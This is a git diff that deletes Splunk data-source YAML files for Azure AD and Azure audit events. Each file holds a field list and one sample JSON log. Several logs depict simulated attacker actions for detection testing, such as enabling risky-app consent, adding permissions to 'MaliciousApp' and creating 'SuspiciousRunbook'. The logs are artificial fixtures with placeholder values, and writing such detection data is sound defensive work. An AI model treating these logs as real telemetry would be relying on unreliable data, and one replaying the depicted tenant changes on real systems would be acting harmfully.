-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-26T13:44:59.0372448Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Set domain authentication", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:6419:f55c:946d:17d1", "correlationId": "57e60ecc-17b8-4ab5-815e-d538e1ca32a4", "Level": 4, "properties": {"id": "Directory_57e60ecc-17b8-4ab5-815e-d538e1ca32a4_XDHHZ_434456733", "category": "DirectoryManagement", "correlationId": "57e60ecc-17b8-4ab5-815e-d538e1ca32a4", "result": "success", "resultReason": "", "activityDisplayName": "Add unverified domain", "activityDateTime": "2023-07-26T13:44:59.0372448+00:00", "loggedByService": "Core Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:6419:f55c:946d:17d1", "roles": []}}, "targetResources": [{"id": null, "displayName": "newdomain.com", "modifiedProperties": [{"displayName": "Name", "oldValue": "[\"\"]", "newValue": "[\"newdomain.com\"]"}, {"displayName": "LiveType", "oldValue": "[\"None\"]", "newValue": "[\"Managed\"]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"Name,LiveType\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Sign-in_activity.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Sign-in_activity.yml
deleted file mode 100644
index 22b9688968..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Sign-in_activity.yml
+++ /dev/null
@@ -1,103 +0,0 @@
-event_name: Azure Active Directory Sign-in activity
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- identity
-- index
-- linecount
-- location
-- operationName
-- operationVersion
-- properties.alternateSignInName
-- properties.appDisplayName
-- properties.appId
-- properties.appServicePrincipalId
-- properties.authenticationDetails{}.RequestSequence
-- properties.authenticationDetails{}.StatusSequence
-- properties.authenticationDetails{}.authenticationMethod
-- properties.authenticationDetails{}.authenticationMethodDetail
-- properties.authenticationDetails{}.authenticationStepDateTime
-- properties.authenticationDetails{}.authenticationStepRequirement
-- properties.authenticationDetails{}.authenticationStepResultDetail
-- properties.authenticationDetails{}.succeeded
-- properties.authenticationProcessingDetails{}.key
-- properties.authenticationProcessingDetails{}.value
-- properties.authenticationProtocol
-- properties.authenticationRequirement
-- properties.authenticationRequirementPolicies{}.detail
-- properties.authenticationRequirementPolicies{}.requirementProvider
-- properties.autonomousSystemNumber
-- properties.clientAppUsed
-- properties.clientCredentialType
-- properties.conditionalAccessStatus
-- properties.correlationId
-- properties.createdDateTime
-- properties.crossTenantAccessType
-- properties.deviceDetail.deviceId
-- properties.deviceDetail.operatingSystem
-- properties.flaggedForReview
-- properties.homeTenantId
-- properties.id
-- properties.incomingTokenType
-- properties.ipAddress
-- properties.isInteractive
-- properties.isTenantRestricted
-- properties.location.city
-- properties.location.countryOrRegion
-- properties.location.geoCoordinates.latitude
-- properties.location.geoCoordinates.longitude
-- properties.location.state
-- properties.originalRequestId
-- properties.originalTransferMethod
-- properties.processingTimeInMilliseconds
-- properties.resourceDisplayName
-- properties.resourceId
-- properties.resourceServicePrincipalId
-- properties.resourceTenantId
-- properties.riskDetail
-- properties.riskLevelAggregated
-- properties.riskLevelDuringSignIn
-- properties.riskState
-- properties.rngcStatus
-- properties.servicePrincipalId
-- properties.signInIdentifier
-- properties.signInTokenProtectionStatus
-- properties.ssoExtensionVersion
-- properties.status.additionalDetails
-- properties.status.errorCode
-- properties.status.failureReason
-- properties.tenantId
-- properties.tokenIssuerName
-- properties.tokenIssuerType
-- properties.uniqueTokenIdentifier
-- properties.userAgent
-- properties.userDisplayName
-- properties.userId
-- properties.userPrincipalName
-- properties.userType
-- punct
-- resourceId
-- resultDescription
-- resultSignature
-- resultType
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-10-24T20:13:31.4449614Z", "resourceId": "/tenants/887c9144-28b8-431b-885b-764fdeefcf62/providers/Microsoft.aadiam", "operationName": "Sign-in activity", "operationVersion": "1.0", "category": "SignInLogs", "tenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "resultType": "50076", "resultSignature": "None", "resultDescription": "Due to a configuration change made by your administrator, or because you moved to a new location, you must use multi-factor authentication to access the resource.", "durationMs": 0, "callerIpAddress": "1.2.3.4", "correlationId": "1f577997-0710-4bd4-848e-5854f748f7dc", "identity": "user15", "Level": 4, "location": "US", "properties": {"id": "22608a25-1d9b-44b5-b0f2-cb94f06b2d00", "createdDateTime": "2023-10-24T20:01:11.9490387+00:00", "userDisplayName": "user15", "userPrincipalName": "user15@splunkresearch.onmicrosoft.com", "userId": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "appId": "1b730954-1685-4b74-9bfd-dac224a7b894", "appDisplayName": "Azure Active Directory PowerShell", "ipAddress": "1.2.3.4", "status": {"errorCode": 50076, "failureReason": "Due to a configuration change made by your administrator, or because you moved to a new location, you must use multi-factor authentication to access the resource.", "additionalDetails": "MFA required in Azure AD"}, "clientAppUsed": "Mobile Apps and Desktop clients", "userAgent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22621.2428", "deviceDetail": {"deviceId": "", "operatingSystem": "Windows"}, "location": {"city": "Rochester", "state": "New York", "countryOrRegion": "US", "geoCoordinates": {"latitude": 20.756160123483984, "longitude": -73.99697875976562}}, "mfaDetail": {}, "correlationId": "1f577997-0710-4bd4-848e-5854f748f7dc", "conditionalAccessStatus": "notApplied", "appliedConditionalAccessPolicies": [], "authenticationContextClassReferences": [], "originalRequestId": "22608a25-1d9b-44b5-b0f2-cb94f06b2d00", "isInteractive": true, 
"tokenIssuerName": "", "tokenIssuerType": "AzureAD", "authenticationProcessingDetails": [{"key": "Legacy TLS (TLS 1.0, 1.1, 3DES)", "value": "False"}, {"key": "Is CAE Token", "value": "False"}], "networkLocationDetails": [], "clientCredentialType": "none", "processingTimeInMilliseconds": 72, "riskDetail": "none", "riskLevelAggregated": "none", "riskLevelDuringSignIn": "none", "riskState": "none", "riskEventTypes": [], "riskEventTypes_v2": [], "resourceDisplayName": "Windows Azure Active Directory", "resourceId": "00000002-0000-0000-c000-000000000000", "resourceTenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "homeTenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "tenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "authenticationDetails": [{"authenticationStepDateTime": "2023-10-24T20:01:11.9490387+00:00", "authenticationMethod": "Password", "authenticationMethodDetail": "Password in the cloud", "succeeded": true, "authenticationStepResultDetail": "Correct password", "authenticationStepRequirement": "Primary authentication", "StatusSequence": 0, "RequestSequence": 1}, {"authenticationStepDateTime": "2023-10-24T20:01:11.9490387+00:00", "succeeded": false, "authenticationStepResultDetail": "MFA required in Azure AD", "authenticationStepRequirement": "Primary authentication"}], "authenticationRequirementPolicies": [{"requirementProvider": "user", "detail": "Per-user MFA"}], "sessionLifetimePolicies": [], "authenticationRequirement": "multiFactorAuthentication", "alternateSignInName": "user15@splunkresearch.onmicrosoft.com", "signInIdentifier": "user15@splunkresearch.onmicrosoft.com", "servicePrincipalId": "", "userType": "Member", "flaggedForReview": false, "isTenantRestricted": false, "autonomousSystemNumber": 12271, "crossTenantAccessType": "none", "privateLinkDetails": {}, "ssoExtensionVersion": "", "uniqueTokenIdentifier": "JYpgIpsdtUSw8suU8GstAA", "authenticationStrengths": [], "incomingTokenType": "none", "authenticationProtocol": "ropc", 
"appServicePrincipalId": null, "resourceServicePrincipalId": "56ad242f-e13b-47fc-8de8-19e3bf6f6575", "rngcStatus": 0, "signInTokenProtectionStatus": "none", "originalTransferMethod": "none"}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_application.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Update_application.yml
deleted file mode 100644
index 3609e89c9c..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_application.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Update application
-fields:
-- _time
-- Level
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2024-01-29T21:31:03.0102031Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam", "operationName": "Update application", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "resultSignature": "None", "durationMs": 0, "correlationId": "a5396d2b-fcf6-41e7-9219-c6239f1298e3", "Level": 4, "properties": {"id": "Directory_a5396d2b-fcf6-41e7-9219-c6239f1298e3_DGBDP_1548236", "category": "ApplicationManagement", "correlationId": "a5396d2b-fcf6-41e7-9219-c6239f1298e3", "result": "success", "resultReason": "", "activityDisplayName": "Update application", "activityDateTime": "2024-01-29T21:31:03.0102031+00:00", "loggedByService": "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName": "user30@splunkresearch.onmicrosoft.com", "ipAddress": "", "roles": []}}, "targetResources": [{"id": "75924835-d844-4947-96ba-18074e997386", "displayName": "MaliciousApp", "type": "Application", "modifiedProperties": [{"displayName": "RequiredResourceAccess", "oldValue": "[{\"ResourceAppId\":\"00000003-0000-0000-c000-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"570282fd-fa5c-430d-a7fd-fc8dc98a9dca\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"7427e0e9-2fba-42fe-b0c0-848c9e6a8182\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1}]", "newValue": 
"[{\"ResourceAppId\":\"00000003-0000-0000-c000-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"570282fd-fa5c-430d-a7fd-fc8dc98a9dca\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"7427e0e9-2fba-42fe-b0c0-848c9e6a8182\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1},{\"ResourceAppId\":\"00000002-0000-0ff1-ce00-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"dc890d15-9560-4a4c-9b7f-a736ec74ec40\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1}]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"RequiredResourceAccess\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"}, {"key": "AppId", "value": "867f0d29-0eab-4017-b691-c4713cc7d7b0"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_authorization_policy.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Update_authorization_policy.yml
deleted file mode 100644
index 8c21799ee1..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_authorization_policy.yml
+++ /dev/null
@@ -1,54 +0,0 @@
-event_name: Azure Active Directory Update authorization policy
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-10-26T19:22:20.2814027Z", "resourceId": "/tenants/5f210575-a69b-41a7-b623-3f6d79ccd432/providers/Microsoft.aadiam", "operationName": "Update authorization policy", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "5f210575-a69b-41a7-b623-3f6d79ccd432", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "1.2.3.4", "correlationId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065", "Level": 4, "properties": {"id": "Directory_cc46d719-4c0f-4b78-8795-b0d6ca5b2065_6CH7M_196574953", "category": "AuthorizationPolicy", "correlationId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065", "result": "success", "resultReason": "", "activityDisplayName": "Update authorization policy", "activityDateTime": "2023-10-26T19:22:20.2814027+00:00", "loggedByService": "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName": "attacker@splunkresearch.onmicrosoft.com", "ipAddress": "1.2.3.4", "roles": []}}, "targetResources": [{"id": "24484114-1daa-4700-aaf7-44ee5cbe5678", "displayName": "Authorization Policy", "type": "Other", "modifiedProperties": [{"displayName": "AllowUserConsentForRiskyApps", "oldValue": "[false]", "newValue": "[true]"}, {"displayName": "PermissionGrantPolicyIdsAssignedToDefaultUserRole", "oldValue": "[\"ManagePermissionGrantsForSelf.microsoft-user-default-legacy\"]", "newValue": "[\"microsoft-user-default-legacy\"]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"AllowUserConsentForRiskyApps, PermissionGrantPolicyIdsAssignedToDefaultUserRole\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Swagger-Codegen/1.0.0.0/csharp/msal"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_user.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Update_user.yml
deleted file mode 100644
index 1c1b1aac34..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_user.yml
+++ /dev/null
@@ -1,55 +0,0 @@
-event_name: Azure Active Directory Update user
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-24T14:28:15.2233481Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Update user", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497", "Level": 4, "properties": {"id": "Directory_d34f6d2e-3120-4b96-b922-e06090f6a497_VPRLA_316413199", "category": "UserManagement", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497", "result": "success", "resultReason": "", "activityDisplayName": "Update user", "activityDateTime": "2023-07-24T14:28:15.2233481+00:00", "loggedByService": "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "roles": []}}, "targetResources": [{"id": "83a3158c-1d08-4686-b5f9-72fb34cb606e", "displayName": null, "type": "User", "userPrincipalName": "testuser@splunkresearch.com", "modifiedProperties": [{"displayName": "AccountEnabled", "oldValue": "[false]", "newValue": "[true]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"AccountEnabled\""}, {"displayName": "TargetId.UserType", "oldValue": null, "newValue": "\"Member\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "UserType", "value": "Member"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_User_registered_security_info.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_User_registered_security_info.yml
deleted file mode 100644
index 0b45453a39..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_User_registered_security_info.yml
+++ /dev/null
@@ -1,51 +0,0 @@
-event_name: Azure Active Directory User registered security info
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultDescription
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-01-30T21:11:30.8690619Z", "resourceId": "/tenants/91da745f-8abb-4a7d-ba94-5667c6f9e01a/providers/Microsoft.aadiam", "operationName": "User registered security info", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "91da745f-8abb-4a7d-ba94-5667c6f9e01a", "resultSignature": "None", "resultDescription": "User registered App Password", "durationMs": 0, "callerIpAddress": "72.1.2.43", "correlationId": "14279c94-7ebc-409f-be4e-7861f13c8a79", "Level": 4, "properties": {"id": "IAMUX_14279c94-7ebc-409f-be4e-7861f13c8a79_K2ATV_323947358", "category": "UserManagement", "correlationId": "14279c94-7ebc-409f-be4e-7861f13c8a79", "result": "success", "resultReason": "User registered App Password", "activityDisplayName": "User registered security info", "activityDateTime": "2023-01-30T21:11:30.8690619+00:00", "loggedByService": "Authentication Methods", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id": "40b61050-e814-4ae5-8ffe-66b6f0c53998", "displayName": null, "userPrincipalName": "User30@splunkresearch.com", "ipAddress": "72.1.2.43", "roles": []}}, "targetResources": [{"id": "40b61050-e814-4ae5-8ffe-66b6f0c53998", "displayName": "User30", "type": "User", "userPrincipalName": "User30@splunkresearch.com", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": []}}'
diff --git a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_Runbook.yml b/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_Runbook.yml
deleted file mode 100644
index 24f228f7f3..0000000000
--- a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_Runbook.yml
+++ /dev/null
@@ -1,91 +0,0 @@
-event_name: Azure Audit Create or Update an Azure Automation Runbook
-fields:
-- _time
-- authorization.action
-- authorization.scope
-- caller
-- channels
-- claims.aio
-- claims.altsecid
-- claims.appid
-- claims.appidacr
-- claims.aud
-- claims.exp
-- claims.groups
-- claims.http://schemas.microsoft.com/claims/authnclassreference
-- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
-- claims.http://schemas.microsoft.com/identity/claims/identityprovider
-- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
-- claims.http://schemas.microsoft.com/identity/claims/scope
-- claims.http://schemas.microsoft.com/identity/claims/tenantid
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
-- claims.iat
-- claims.ipaddr
-- claims.iss
-- claims.name
-- claims.nbf
-- claims.puid
-- claims.rh
-- claims.uti
-- claims.ver
-- claims.wids
-- claims.xms_tcdt
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- eventDataId
-- eventName.localizedValue
-- eventName.value
-- eventSource.localizedValue
-- eventSource.value
-- eventTimestamp
-- host
-- id
-- index
-- level
-- linecount
-- object
-- object_id
-- object_path
-- operationId
-- operationName.localizedValue
-- operationName.value
-- product
-- properties.entity
-- properties.eventCategory
-- properties.hierarchy
-- properties.message
-- punct
-- resourceGroupName
-- resourceProviderName.localizedValue
-- resourceProviderName.value
-- resourceUri
-- source
-- sourcetype
-- splunk_server
-- status
-- status.localizedValue
-- status.value
-- subStatus.value
-- submissionTimestamp
-- subscriptionId
-- timeendpos
-- timestartpos
-- user
-- user_name
-- vendor
-- vendor_product
-- vendor_res_code
-example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/runbooks/write", "scope": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourceGroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook"}, "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/", "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661194261", "nbf": "1661194261", "exp": "1661198249", "http://schemas.microsoft.com/claims/authnclassreference": "1", "aio": "AWQAm/8TAAAA3iMcbqqPPdXPATT7oalIKsh6wEFsyQ+zUVCshaLu77xsLlt067TtI11gy5hAx+z905hrX1VBehDGaedvEg2UF0BSbHVL9bJrry4zk3Xt+HNt5dTXDDgABOFuNB4QJBUW", "altsecid": "1:live.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences": "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "evilAdmin@contoso.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname": "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John", "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider": "live.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier": "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.", "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid": "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name": "contoso.com#evilAdmin@contoso.com", "uti": "YMAP5fOmMkuuBUgBe-Z5AA", "ver": "1.0", 
"wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId": "49b945c0-966a-48d8-b79b-31f184544594", "description": "", "eventDataId": "303f17eb-10cb-458f-8a80-683f40f123a2", "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource": {"value": "Administrative", "localizedValue": "Administrative"}, "id": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook/events/303f17eb-10cb-458f-8a80-683f40f123a2/ticks/637967920541346086", "level": "Informational", "resourceGroupName": "resourceGroup1", "resourceProviderName": {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook", "operationId": "b6e30ace-986c-4735-980f-926db0b43336", "operationName": {"value": "Microsoft.Automation/automationAccounts/runbooks/write", "localizedValue": "Create or Update an Azure Automation Runbook"}, "properties": {"eventCategory": "Administrative", "entity": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook", "message": "Microsoft.Automation/automationAccounts/runbooks/write", "hierarchy": "1aee0e3d-b75b-440a-a927-76f0552a14e6"}, "status": {"value": "Succeeded", "localizedValue": "Succeeded"}, "subStatus": {"value": "", "localizedValue": ""}, "eventTimestamp": "2022-08-22T19:07:34.1346086Z", "submissionTimestamp": "2022-08-22T19:08:54.1547383Z", "subscriptionId": "1aee0e3d-b75b-440a-a927-76f0552a14e6"}'
diff --git a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_account.yml b/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_account.yml
deleted file mode 100644
index 74f9e42228..0000000000
--- a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_account.yml
+++ /dev/null
@@ -1,91 +0,0 @@
-event_name: Azure Audit Create or Update an Azure Automation account
-fields:
-- _time
-- authorization.action
-- authorization.scope
-- caller
-- channels
-- claims.aio
-- claims.altsecid
-- claims.appid
-- claims.appidacr
-- claims.aud
-- claims.exp
-- claims.groups
-- claims.http://schemas.microsoft.com/claims/authnclassreference
-- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
